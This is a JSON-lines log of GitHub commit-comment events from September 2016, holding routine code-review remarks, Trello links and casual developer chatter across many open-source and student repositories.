{"id":"4514590553","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18894557,"position":77,"line":115,"path":"src/wallOverlap.h","commit_id":"cf4731cc385d7281e510ef3546889657e10aeff6","created_at":"2016-09-04T23:45:22Z","updated_at":"2016-09-04T23:45:22Z","body":"We might consider changing the names of all of these, next blue moon :stuck_out_tongue: It's just so hard to come up with a good, distinctive name."}},"created_at":"2016-09-04T23:45:22Z"}
{"id":"4514593345","type":"CommitCommentEvent","actor":{"login":"Brazuca87"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18894563,"position":null,"line":null,"path":null,"commit_id":"e172a246712c36a92a7d0a31509023d1ed382985","created_at":"2016-09-04T23:47:50Z","updated_at":"2016-09-04T23:47:50Z","body":"@NzV Why were so many pokemons added to the evolve list? Espeicially pokemons that either cannot be evolved, or are already fully evolved?"}},"created_at":"2016-09-04T23:47:50Z"}
{"id":"4514595082","type":"CommitCommentEvent","actor":{"login":"matthuhiggins"},"repo":{"name":"data-axle/superstore"},"payload":{"comment":{"id":18894566,"position":null,"line":null,"path":null,"commit_id":"81dbac521e3e79e47a3702fcdd6751cbaa32a955","created_at":"2016-09-04T23:49:26Z","updated_at":"2016-09-04T23:49:26Z","body":"This kind of version bump causes version bloat."}},"created_at":"2016-09-04T23:49:26Z"}
{"id":"4514595958","type":"CommitCommentEvent","actor":{"login":"1KX2"},"repo":{"name":"tayvz/Mars-App"},"payload":{"comment":{"id":18894572,"position":null,"line":null,"path":null,"commit_id":"c91a2ccbe8542485deeac08502214bb8303b82c0","created_at":"2016-09-04T23:50:12Z","updated_at":"2016-09-04T23:50:12Z","body":"I won't be silenced...... "}},"created_at":"2016-09-04T23:50:12Z"}
{"id":"4514596279","type":"CommitCommentEvent","actor":{"login":"TheRealMarnes"},"repo":{"name":"TheRealMarnes/jdbi"},"payload":{"comment":{"id":18894574,"position":55,"line":123,"path":"src/main/java/org/skife/jdbi/v2/unstable/BindIn.java","commit_id":"0506f9cc689c7e33bcad425217538979d8ac1720","created_at":"2016-09-04T23:50:27Z","updated_at":"2016-09-04T23:50:27Z","body":"this could just as well be\r\n`throw new IllegalArgumentException(\"argument is neither an array nor a collection\")`\r\nsince it'll just throw an npe further down the line"}},"created_at":"2016-09-04T23:50:27Z"}
{"id":"4514596880","type":"CommitCommentEvent","actor":{"login":"Tarocco"},"repo":{"name":"Apelsin/EffervescenceViewer"},"payload":{"comment":{"id":18894580,"position":5,"line":54,"path":"indra/newview/skins/default/xui/en-us/menu_login.xml","commit_id":"b7fc27aff2c0308f2321a9f5e626f7fa1f87ae69","created_at":"2016-09-04T23:51:00Z","updated_at":"2016-09-04T23:51:00Z","body":"shout out to my home slice @HazimGazov"}},"created_at":"2016-09-04T23:51:00Z"}
{"id":"4514597643","type":"CommitCommentEvent","actor":{"login":"Apelsin"},"repo":{"name":"Apelsin/EffervescenceViewer"},"payload":{"comment":{"id":18894583,"position":5,"line":54,"path":"indra/newview/skins/default/xui/en-us/menu_login.xml","commit_id":"b7fc27aff2c0308f2321a9f5e626f7fa1f87ae69","created_at":"2016-09-04T23:51:44Z","updated_at":"2016-09-04T23:51:44Z","body":"shoutout to my home slice @HazimGazov"}},"created_at":"2016-09-04T23:51:44Z"}
{"id":"4514598599","type":"CommitCommentEvent","actor":{"login":"Dreameeer"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18894587,"position":null,"line":null,"path":null,"commit_id":"bd31c4070e49ca298017eb6cb26850ca71153010","created_at":"2016-09-04T23:52:32Z","updated_at":"2016-09-04T23:52:32Z","body":"only comments are added which are not logical.. no indentation done. "}},"created_at":"2016-09-04T23:52:32Z"}
{"id":"4514599372","type":"CommitCommentEvent","actor":{"login":"bhollis"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":18894588,"position":null,"line":null,"path":null,"commit_id":"c36aac9eaa3455a9b842d0b55b56b3d2d90e2cd7","created_at":"2016-09-04T23:53:14Z","updated_at":"2016-09-04T23:53:14Z","body":"What was the problem with the new style analytics?"}},"created_at":"2016-09-04T23:53:14Z"}
{"id":"4514600732","type":"CommitCommentEvent","actor":{"login":"luigiplr"},"repo":{"name":"Magics-Group/magics-challenge"},"payload":{"comment":{"id":18894590,"position":null,"line":null,"path":null,"commit_id":"302b3a38a3401f5e414586413ddf01c0d16104c5","created_at":"2016-09-04T23:54:27Z","updated_at":"2016-09-04T23:54:27Z","body":"...."}},"created_at":"2016-09-04T23:54:27Z"}
{"id":"4514601057","type":"CommitCommentEvent","actor":{"login":"Dreameeer"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18894591,"position":null,"line":null,"path":null,"commit_id":"6b18f946fdfce1bf12590db6b2e56b079f0c018b","created_at":"2016-09-04T23:54:42Z","updated_at":"2016-09-04T23:54:42Z","body":"comments needs to be added"}},"created_at":"2016-09-04T23:54:42Z"}
{"id":"4514601740","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18894592,"position":null,"line":null,"path":null,"commit_id":"3c6b153e60e7136b3f4b0b7549cbb482b9273b2b","created_at":"2016-09-04T23:54:57Z","updated_at":"2016-09-04T23:54:57Z","body":"The `d` suffix is not an official suffix. It may not be implemented by the compiler we're using for Darwin. Only the `f` and `l` suffixes exist, officially. Without suffix always means double."}},"created_at":"2016-09-04T23:54:57Z"}
{"id":"4514601845","type":"CommitCommentEvent","actor":{"login":"Dreameeer"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18894593,"position":null,"line":null,"path":null,"commit_id":"18fb8cfe5d74c8cfdd79e69434f9147a1521fc25","created_at":"2016-09-04T23:55:03Z","updated_at":"2016-09-04T23:55:03Z","body":"comments needs to be addded"}},"created_at":"2016-09-04T23:55:03Z"}
{"id":"4514601983","type":"CommitCommentEvent","actor":{"login":"Grazfather"},"repo":{"name":"snare/voltron"},"payload":{"comment":{"id":18894595,"position":null,"line":null,"path":null,"commit_id":"4da438de632ffaf195002b5137546f065cba6073","created_at":"2016-09-04T23:55:10Z","updated_at":"2016-09-04T23:55:10Z","body":":) ty"}},"created_at":"2016-09-04T23:55:10Z"}
{"id":"4514602015","type":"CommitCommentEvent","actor":{"login":"SunburnedGoose"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":18894596,"position":null,"line":null,"path":null,"commit_id":"c36aac9eaa3455a9b842d0b55b56b3d2d90e2cd7","created_at":"2016-09-04T23:55:11Z","updated_at":"2016-09-04T23:55:11Z","body":"Requires permission change in DIM's manifest file. Didn't want to ping users again for another permission update so I went back to the old format. "}},"created_at":"2016-09-04T23:55:11Z"}
{"id":"4514603419","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI_ExtraActionBars"},"payload":{"comment":{"id":18894598,"position":null,"line":null,"path":null,"commit_id":"fc269a59241e67b0e7719b6035457c9b3b62da71","created_at":"2016-09-04T23:56:22Z","updated_at":"2016-09-04T23:56:22Z","body":"Holy shit! No way! Did you just really backport ElvUI_ExtraActionBars before I got back home? <3"}},"created_at":"2016-09-04T23:56:22Z"}
{"id":"4514607165","type":"CommitCommentEvent","actor":{"login":"jssim"},"repo":{"name":"jssim/test"},"payload":{"comment":{"id":18894607,"position":null,"line":null,"path":null,"commit_id":"97bf6b7a02005676a7c8fc7521612d1ff86b435f","created_at":"2016-09-04T23:59:45Z","updated_at":"2016-09-04T23:59:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5RNonuIJ&#x2F;3-1\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> 예약박스 긴급 1</a>"}},"created_at":"2016-09-04T23:59:45Z"}
{"id":"4514607281","type":"CommitCommentEvent","actor":{"login":"jssim"},"repo":{"name":"jssim/test"},"payload":{"comment":{"id":18894608,"position":null,"line":null,"path":null,"commit_id":"68280e5aaa439ab4963180f1de1d535d9f652f16","created_at":"2016-09-04T23:59:50Z","updated_at":"2016-09-04T23:59:50Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5RNonuIJ&#x2F;3-1\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> 예약박스 긴급 1</a>"}},"created_at":"2016-09-04T23:59:50Z"}
{"id":"4513106450","type":"CommitCommentEvent","actor":{"login":"slinjhu"},"repo":{"name":"MengdanZhang0321/leetcode"},"payload":{"comment":{"id":18891896,"position":14,"line":14,"path":"README.md","commit_id":"fd016f161960a69fade1bc1934b31df116df3b05","created_at":"2016-09-04T03:03:39Z","updated_at":"2016-09-04T03:03:39Z","body":"No need to know all these. You only need to remember that a smaller symbol followed by a lager one needs to be subtracted. "}},"created_at":"2016-09-04T03:03:39Z"}
{"id":"4513107798","type":"CommitCommentEvent","actor":{"login":"iangudger"},"repo":{"name":"seadsystem/Backend"},"payload":{"comment":{"id":18891898,"position":null,"line":null,"path":null,"commit_id":"cc5bc705f31da5d2b1d0eb5dc40a06090ac79bc8","created_at":"2016-09-04T03:05:17Z","updated_at":"2016-09-04T03:05:17Z","body":"Looks good to me!"}},"created_at":"2016-09-04T03:05:17Z"}
{"id":"4513107969","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18891899,"position":null,"line":null,"path":null,"commit_id":"37668908f9234db55ff04fb22e3d17b8c7114488","created_at":"2016-09-04T03:05:28Z","updated_at":"2016-09-04T03:05:28Z","body":"Another thought on the menu structure. We could support 2 different structures by simply creating another file called menu_data_2.php and then using a global to choose. So, could have one structure mimick the left nav(what is there currently) and then the second one be a complete rebuild using standard menu organization. I am guessing what will happen is that upgraders will initially be more comfortable with the left_nav while the new users will be more comfortable with the standard menu structure."}},"created_at":"2016-09-04T03:05:28Z"}
{"id":"4513108744","type":"CommitCommentEvent","actor":{"login":"iangudger"},"repo":{"name":"seadsystem/Backend"},"payload":{"comment":{"id":18891901,"position":3,"line":2,"path":"LICENSE.txt","commit_id":"cc5bc705f31da5d2b1d0eb5dc40a06090ac79bc8","created_at":"2016-09-04T03:06:21Z","updated_at":"2016-09-04T03:06:21Z","body":"Drop the \"The\", its cleaner.\r\n\r\nIt should be just \"Google Inc.\", not \"The Google Inc.\""}},"created_at":"2016-09-04T03:06:21Z"}
{"id":"4513109621","type":"CommitCommentEvent","actor":{"login":"iangudger"},"repo":{"name":"seadsystem/Backend"},"payload":{"comment":{"id":18891903,"position":6,"line":4,"path":"LICENSE.txt","commit_id":"cc5bc705f31da5d2b1d0eb5dc40a06090ac79bc8","created_at":"2016-09-04T03:07:21Z","updated_at":"2016-09-04T03:07:21Z","body":"It would be nice to list everyone who has contributed to this repo."}},"created_at":"2016-09-04T03:07:21Z"}
{"id":"4513109720","type":"CommitCommentEvent","actor":{"login":"slinjhu"},"repo":{"name":"MengdanZhang0321/leetcode"},"payload":{"comment":{"id":18891904,"position":42,"line":42,"path":"013_Roman_to_Integer.cpp","commit_id":"a6c3073a9b039d73f9d6cd5e8cd0db0c8a390e3a","created_at":"2016-09-04T03:07:32Z","updated_at":"2016-09-04T03:07:32Z","body":"It might be better to save the iterator instead of finding it again. It also helps to keep brackets persistent: if you wrap the \"if then\" block with brackets, then you'd better wrap the \"else\" block."}},"created_at":"2016-09-04T03:07:32Z"}
{"id":"4513111042","type":"CommitCommentEvent","actor":{"login":"slinjhu"},"repo":{"name":"MengdanZhang0321/leetcode"},"payload":{"comment":{"id":18891905,"position":64,"line":64,"path":"013_Roman_to_Integer.cpp","commit_id":"a6c3073a9b039d73f9d6cd5e8cd0db0c8a390e3a","created_at":"2016-09-04T03:09:09Z","updated_at":"2016-09-04T03:09:09Z","body":"Consider unordered_map<char,int> for conciseness and space efficiency. "}},"created_at":"2016-09-04T03:09:09Z"}
{"id":"4513112017","type":"CommitCommentEvent","actor":{"login":"cvicentiu"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":18891906,"position":16,"line":1216,"path":"mysql-test/t/win.test","commit_id":"4d1e032458c7cb591da77ad576a8694fe65dddb6","created_at":"2016-09-04T03:10:12Z","updated_at":"2016-09-04T03:10:12Z","body":"When doing such a select statement, before this patch we would first add 1 row encompassing the full partition (238). Afterwards we would try to remove all the rows till we reach a \"non-peer\". This included rows outside the current partition. (238 but also 242)"}},"created_at":"2016-09-04T03:10:12Z"}
{"id":"4513114272","type":"CommitCommentEvent","actor":{"login":"veprbl"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18891911,"position":10,"line":7,"path":"pkgs/development/libraries/fontconfig/make-fonts-conf.nix","commit_id":"4f73633f26e80fb8b06f68793973c6e5089c790c","created_at":"2016-09-04T03:12:41Z","updated_at":"2016-09-04T03:12:41Z","body":"dejavu_fonts depends fontforge\r\nlater doesn't build on my OSX system without pango which depends on cairo which depends on fontconfig...\r\nfix in #18063 doesn't help"}},"created_at":"2016-09-04T03:12:41Z"}
{"id":"4513114536","type":"CommitCommentEvent","actor":{"login":"slinjhu"},"repo":{"name":"MengdanZhang0321/leetcode"},"payload":{"comment":{"id":18891912,"position":15,"line":15,"path":"387_First_Unique_Character_in_a_String.cpp","commit_id":"a6c3073a9b039d73f9d6cd5e8cd0db0c8a390e3a","created_at":"2016-09-04T03:13:01Z","updated_at":"2016-09-04T03:13:01Z","body":"\"dict\" is not a good name for an array."}},"created_at":"2016-09-04T03:13:01Z"}
{"id":"4513114927","type":"CommitCommentEvent","actor":{"login":"ronrat"},"repo":{"name":"speceasy/speceasy"},"payload":{"comment":{"id":18891913,"position":null,"line":null,"path":null,"commit_id":"e658d499e253bb7a9a08a78bab660906e03bde46","created_at":"2016-09-04T03:13:31Z","updated_at":"2016-09-04T03:13:31Z","body":"@rockhymas I'm working on some release notes for the v2.1 release. The log message for this commit says to \"see the readme\" for information on the new spec methods (`And`, `But`) that you created but I'm not seeing where you made any updates to the `readme.md` file. Did you end up not making those updates or am I missing something?"}},"created_at":"2016-09-04T03:13:31Z"}
{"id":"4513116151","type":"CommitCommentEvent","actor":{"login":"Aspsine"},"repo":{"name":"Aspsine/IRecyclerView"},"payload":{"comment":{"id":18891914,"position":null,"line":null,"path":null,"commit_id":"e66481649096a4a57cc6959e39791b353367ac12","created_at":"2016-09-04T03:14:57Z","updated_at":"2016-09-04T03:14:57Z","body":"#18 \r\nfixed"}},"created_at":"2016-09-04T03:14:57Z"}
{"id":"4513117304","type":"CommitCommentEvent","actor":{"login":"veprbl"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18891917,"position":10,"line":7,"path":"pkgs/development/libraries/fontconfig/make-fonts-conf.nix","commit_id":"4f73633f26e80fb8b06f68793973c6e5089c790c","created_at":"2016-09-04T03:16:14Z","updated_at":"2016-09-04T03:16:14Z","body":"not to mention that dejavu_fonts are marked as broken for OSX"}},"created_at":"2016-09-04T03:16:14Z"}
{"id":"4513118726","type":"CommitCommentEvent","actor":{"login":"plicjo"},"repo":{"name":"paulelliott/authem"},"payload":{"comment":{"id":18891918,"position":null,"line":null,"path":null,"commit_id":"86113a0efcc503d34ff38692a2f17497710def55","created_at":"2016-09-04T03:17:46Z","updated_at":"2016-09-04T03:17:46Z","body":"oh wow"}},"created_at":"2016-09-04T03:17:46Z"}
{"id":"4513120861","type":"CommitCommentEvent","actor":{"login":"Extreme112"},"repo":{"name":"Extreme112/monopv1"},"payload":{"comment":{"id":18891920,"position":null,"line":null,"path":null,"commit_id":"d0498bd19391cfe91039192edc9d2b563f0ba08a","created_at":"2016-09-04T03:20:17Z","updated_at":"2016-09-04T03:20:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;FKJki3Kw&#x2F;16-popup-keyboard\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Popup keyboard.</a>"}},"created_at":"2016-09-04T03:20:17Z"}
{"id":"4513121071","type":"CommitCommentEvent","actor":{"login":"Extreme112"},"repo":{"name":"Extreme112/monopv1"},"payload":{"comment":{"id":18891921,"position":null,"line":null,"path":null,"commit_id":"d0498bd19391cfe91039192edc9d2b563f0ba08a","created_at":"2016-09-04T03:20:29Z","updated_at":"2016-09-04T03:20:29Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;bzUWYRZO&#x2F;15-error-when-pressing-ok-when-you-don-t-enter-an-amount-for-pay-to-bank\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Error when pressing OK when you don&#39;t enter an amount for Pay to Bank.</a>"}},"created_at":"2016-09-04T03:20:29Z"}
{"id":"4513123175","type":"CommitCommentEvent","actor":{"login":"Extreme112"},"repo":{"name":"Extreme112/monopv1"},"payload":{"comment":{"id":18891923,"position":null,"line":null,"path":null,"commit_id":"aa6909db47ca174635d64a19e1a513b2a6561f85","created_at":"2016-09-04T03:23:08Z","updated_at":"2016-09-04T03:23:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;UCSfhSC1&#x2F;8-choose-number-of-players-on-startup\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Choose number of players on startup</a>"}},"created_at":"2016-09-04T03:23:08Z"}
{"id":"4513124552","type":"CommitCommentEvent","actor":{"login":"gac410"},"repo":{"name":"foswiki/DocumentViewerPlugin"},"payload":{"comment":{"id":18891928,"position":6,"line":10,"path":"lib/Foswiki/Plugins/DocumentViewerPlugin.pm","commit_id":"ca6aeee23b2a3bdd4b34a0911e704f398bc392b3","created_at":"2016-09-04T03:24:41Z","updated_at":"2016-09-04T03:24:41Z","body":"No, 1.2 would be fine,  or 2.01,   but 1.01 and 1.02 are both \"lower\" than 1.1\r\nperl -E \"print version->parse(\"1.02\")->numify\"   (Returns 1.020) \r\nperl -E \"print version->parse(\"1.1\")->numify\"  (Returns 1.100)\r\n\r\n1.01 or 1.02 will probably not be detected as newer than 1.1 by configure.\r\n"}},"created_at":"2016-09-04T03:24:41Z"}
{"id":"4513125476","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18891929,"position":null,"line":null,"path":null,"commit_id":"6bf74e5e2044f374a15ccad2954ad45c844527db","created_at":"2016-09-04T03:25:39Z","updated_at":"2016-09-04T03:25:39Z","body":"my bad! 😭 "}},"created_at":"2016-09-04T03:25:39Z"}
{"id":"4513125712","type":"CommitCommentEvent","actor":{"login":"epinapala"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18891930,"position":49,"line":54,"path":"utils/helper.js","commit_id":"93c5661369a4533eef65b08654d4387f544ee5c9","created_at":"2016-09-04T03:25:57Z","updated_at":"2016-09-04T03:25:57Z","body":"started to add it. will have to use it to group mandatory / optional roles."}},"created_at":"2016-09-04T03:25:57Z"}
{"id":"4513125778","type":"CommitCommentEvent","actor":{"login":"Undre4m"},"repo":{"name":"Undre4m/puma"},"payload":{"comment":{"id":18891931,"position":null,"line":null,"path":null,"commit_id":"8edd900e95025f5a404492e4cac5acd64dedb377","created_at":"2016-09-04T03:26:00Z","updated_at":"2016-09-04T03:26:00Z","body":"Note: Since puma throws **Type Error** by own account when it stumbles upon \r\nmost of the errors herein tested, discerning the error thrown in \r\nruntime by the original script seems not possible/profitable.\r\nInstead particular error instances are not compared or either compared\r\nagainst general instance Error.\r\n\r\nFirst Error of the list of every **Error** Type coded as a functioning example.\r\nRemaining Error checks to be completed, or not, in future.\r\nLeft a template in case this are done:\r\n\r\n```\r\n/////       TEMPLATE LEFT AS REFERENCE FOR FUTURE CODING       /////\r\n    \r\n    /*\r\n    test(\"YYYError: XXXXX\", function () {\r\n        try {\r\n            var result = puma.evalPuma(\"HERE ERROR THROWING CODE;\");\r\n        }\r\n        catch (e) {\r\n            if (e instanceof YYYError) {\r\n                equal(e.message, \"HERE ERROR MESSAGE TO BE THROWN\", \"Passed!\");\r\n            }\r\n        }\r\n    });\r\n    */\r\n```\r\n\r\nNon referenced variables when used return **null** instead of throwing **ReferenceError**, unsure if programed behaviour or defect."}},"created_at":"2016-09-04T03:26:00Z"}
{"id":"4513126320","type":"CommitCommentEvent","actor":{"login":"ComMouse"},"repo":{"name":"laohyx/electsys"},"payload":{"comment":{"id":18891935,"position":15,"line":37,"path":"manifest.json","commit_id":"1b73fc324f6d4c009678be0d620b8248d8abafa6","created_at":"2016-09-04T03:26:44Z","updated_at":"2016-09-04T03:26:44Z","body":"@laohyx 现在是 http://nhce.sjtu.edu.cn/，然后似乎页面改版过？"}},"created_at":"2016-09-04T03:26:44Z"}
{"id":"4513131058","type":"CommitCommentEvent","actor":{"login":"veprbl"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18891937,"position":10,"line":7,"path":"pkgs/development/libraries/fontconfig/make-fonts-conf.nix","commit_id":"4f73633f26e80fb8b06f68793973c6e5089c790c","created_at":"2016-09-04T03:32:19Z","updated_at":"2016-09-04T03:32:19Z","body":"pango dependency was caused by XQuartz impurity\r\ncreated #18278"}},"created_at":"2016-09-04T03:32:19Z"}
{"id":"4513132131","type":"CommitCommentEvent","actor":{"login":"vutran"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18891938,"position":null,"line":null,"path":null,"commit_id":"6bf74e5e2044f374a15ccad2954ad45c844527db","created_at":"2016-09-04T03:33:34Z","updated_at":"2016-09-04T03:33:34Z","body":"All good. 👍 "}},"created_at":"2016-09-04T03:33:34Z"}
{"id":"4513134372","type":"CommitCommentEvent","actor":{"login":"Zenns"},"repo":{"name":"Maxcloud/Mushy"},"payload":{"comment":{"id":18891940,"position":null,"line":null,"path":null,"commit_id":"a11294105dca4fc38b049348cb935ee5c3209510","created_at":"2016-09-04T03:36:04Z","updated_at":"2016-09-04T03:36:04Z","body":"Why did you close the commit for?"}},"created_at":"2016-09-04T03:36:04Z"}
{"id":"4513138051","type":"CommitCommentEvent","actor":{"login":"cnlohr"},"repo":{"name":"cnlohr/esp82xx"},"payload":{"comment":{"id":18891950,"position":null,"line":null,"path":null,"commit_id":"bea34af93d5773b2298d168f105b4fc73b2c813f","created_at":"2016-09-04T03:40:28Z","updated_at":"2016-09-04T03:40:28Z","body":"old behavior?  Hmm... seems like a thing that would be a little annoying to keep.  Perhaps just #define out the part where it actually restores?  Would you mind throwing it in and testing it?"}},"created_at":"2016-09-04T03:40:28Z"}
{"id":"4513141314","type":"CommitCommentEvent","actor":{"login":"marb99"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18891952,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-04T03:43:57Z","updated_at":"2016-09-04T03:43:57Z","body":"tested right now and work fine"}},"created_at":"2016-09-04T03:43:57Z"}
{"id":"4513144753","type":"CommitCommentEvent","actor":{"login":"tianzhijiexian"},"repo":{"name":"guyca/react-native"},"payload":{"comment":{"id":18891953,"position":null,"line":null,"path":null,"commit_id":"3ef51a1f17077209f57b36928cc302bca2d1a072","created_at":"2016-09-04T03:47:25Z","updated_at":"2016-09-04T03:47:25Z","body":"THx"}},"created_at":"2016-09-04T03:47:25Z"}
{"id":"4513145335","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"mapnik/node-mapnik"},"payload":{"comment":{"id":18891954,"position":12,"line":12,"path":"scripts/is_pr_merge.sh","commit_id":"240bedcbeeb8d8583706bbca61b87c27b1a29758","created_at":"2016-09-04T03:47:59Z","updated_at":"2016-09-04T03:47:59Z","body":"@lightmare ah, that makes me think the usecase here is slightly different: for node-mapnik publishes I use a special `[publish binary]` token in the commit message and I want that to fire from PRs as well as pushes to master. But travis has a behavior of sending off two builds for PRs, one normal and one a \"merge\". This script detects the difference to avoid double publishing. If I understand right, mapnik/mapnik@6960c85 is about preventing any publishing from any PR."}},"created_at":"2016-09-04T03:47:59Z"}
{"id":"4513145494","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18891955,"position":null,"line":null,"path":null,"commit_id":"1a5a7c59054e6197dac83cc64ce8fd15fd2b2cb6","created_at":"2016-09-04T03:48:11Z","updated_at":"2016-09-04T03:48:11Z","body":"@mhugo , nice feature. I've just tried out, and it seems to fail at one useful scenario: layer dependencies via symbology rendering. See this video for an example of what I mean (https://www.youtube.com/watch?v=UnxP8I3uqhA).\r\n\r\nBasically, the \"battleship\" layer (i.e. the grid with colored blocks) is styled based on spatial intersection with geometries from another layer, called \"hits\", in which the user inputs points. Right now, the symbology automatically updates via a little hack (by setting the battleship's label mode to \"obstacle\"). But a proper solution would actually be to declare a dependency between the battleship layer and the hits layer.\r\n\r\nYour feature is doing that, it only needs to insure that data added on a layer A triggers a symbology refresh of layer B with a dependency declared to layer A.\r\n\r\n(ping @nyalldawson )"}},"created_at":"2016-09-04T03:48:11Z"}
{"id":"4513148403","type":"CommitCommentEvent","actor":{"login":"cnlohr"},"repo":{"name":"cnlohr/esp82xx"},"payload":{"comment":{"id":18891958,"position":null,"line":null,"path":null,"commit_id":"bea34af93d5773b2298d168f105b4fc73b2c813f","created_at":"2016-09-04T03:51:26Z","updated_at":"2016-09-04T03:51:26Z","body":"Scratch that, I'll get it sort of back."}},"created_at":"2016-09-04T03:51:26Z"}
{"id":"4513150291","type":"CommitCommentEvent","actor":{"login":"robodair"},"repo":{"name":"sudouc/spectrumuc"},"payload":{"comment":{"id":18891962,"position":null,"line":null,"path":null,"commit_id":"f9285fe351aaf57b4fad83914d77bb9991016fe4","created_at":"2016-09-04T03:53:29Z","updated_at":"2016-09-04T03:53:29Z","body":"You're rude 👅 "}},"created_at":"2016-09-04T03:53:29Z"}
{"id":"4513151016","type":"CommitCommentEvent","actor":{"login":"yellowjackets200"},"repo":{"name":"yellowjackets200/libbtc"},"payload":{"comment":{"id":18891963,"position":null,"line":null,"path":null,"commit_id":"4e16e5608a90ab6114fd8c3645010ffe591f3503","created_at":"2016-09-04T03:54:22Z","updated_at":"2016-09-04T03:54:22Z","body":"I think my commit is behind yours. I noticed you included this submodule directly in the last batch of commits."}},"created_at":"2016-09-04T03:54:22Z"}
{"id":"4513151610","type":"CommitCommentEvent","actor":{"login":"jiazi620"},"repo":{"name":"jiazi620/wonderful-world"},"payload":{"comment":{"id":18891964,"position":null,"line":null,"path":null,"commit_id":"88e82730d0c805aee1e23cc2d5aa0efe1e71f434","created_at":"2016-09-04T03:55:11Z","updated_at":"2016-09-04T03:55:11Z","body":"Record the journey of growing"}},"created_at":"2016-09-04T03:55:11Z"}
{"id":"4513152476","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18891966,"position":null,"line":null,"path":null,"commit_id":"7126d894cac4112fe75203cf8ffdf7862cbcdf21","created_at":"2016-09-04T03:56:17Z","updated_at":"2016-09-04T03:56:17Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-04T03:56:17Z"}
{"id":"4513160154","type":"CommitCommentEvent","actor":{"login":"ryosuketter"},"repo":{"name":"test-gr/test"},"payload":{"comment":{"id":18891973,"position":null,"line":null,"path":null,"commit_id":"2599b0b9961bc4298636c09bbf7aa36dbeea3f96","created_at":"2016-09-04T04:05:01Z","updated_at":"2016-09-04T04:05:01Z","body":"なんでdashiにしたの？"}},"created_at":"2016-09-04T04:05:01Z"}
{"id":"4513160634","type":"CommitCommentEvent","actor":{"login":"masuno"},"repo":{"name":"test-gr/test"},"payload":{"comment":{"id":18891976,"position":null,"line":null,"path":null,"commit_id":"2599b0b9961bc4298636c09bbf7aa36dbeea3f96","created_at":"2016-09-04T04:05:34Z","updated_at":"2016-09-04T04:05:34Z","body":"なんかいい感じでしょ"}},"created_at":"2016-09-04T04:05:34Z"}
{"id":"4513161456","type":"CommitCommentEvent","actor":{"login":"ryosuketter"},"repo":{"name":"test-gr/test"},"payload":{"comment":{"id":18891978,"position":null,"line":null,"path":null,"commit_id":"2599b0b9961bc4298636c09bbf7aa36dbeea3f96","created_at":"2016-09-04T04:06:31Z","updated_at":"2016-09-04T04:06:31Z","body":"**センスを感じるね。**"}},"created_at":"2016-09-04T04:06:31Z"}
{"id":"4513162233","type":"CommitCommentEvent","actor":{"login":"SacCs112KimElliot"},"repo":{"name":"SacCs112KimElliot/SAC_CS112_JAVA_HelloSac_ElliotKim"},"payload":{"comment":{"id":18891980,"position":null,"line":null,"path":null,"commit_id":"8d393d8274075689275f4e6c2572f01ef83ce361","created_at":"2016-09-04T04:07:32Z","updated_at":"2016-09-04T04:07:32Z","body":"Update SAC_CS112_JAVA_HelloSac_ElliotKim.Java"}},"created_at":"2016-09-04T04:07:32Z"}
{"id":"4513162524","type":"CommitCommentEvent","actor":{"login":"SacCs112KimElliot"},"repo":{"name":"SacCs112KimElliot/SAC_CS112_JAVA_HelloSac_ElliotKim"},"payload":{"comment":{"id":18891981,"position":null,"line":null,"path":null,"commit_id":"8d393d8274075689275f4e6c2572f01ef83ce361","created_at":"2016-09-04T04:07:49Z","updated_at":"2016-09-04T04:07:49Z","body":"Update SAC_CS112_JAVA_HelloSac_ElliotKim.Java"}},"created_at":"2016-09-04T04:07:49Z"}
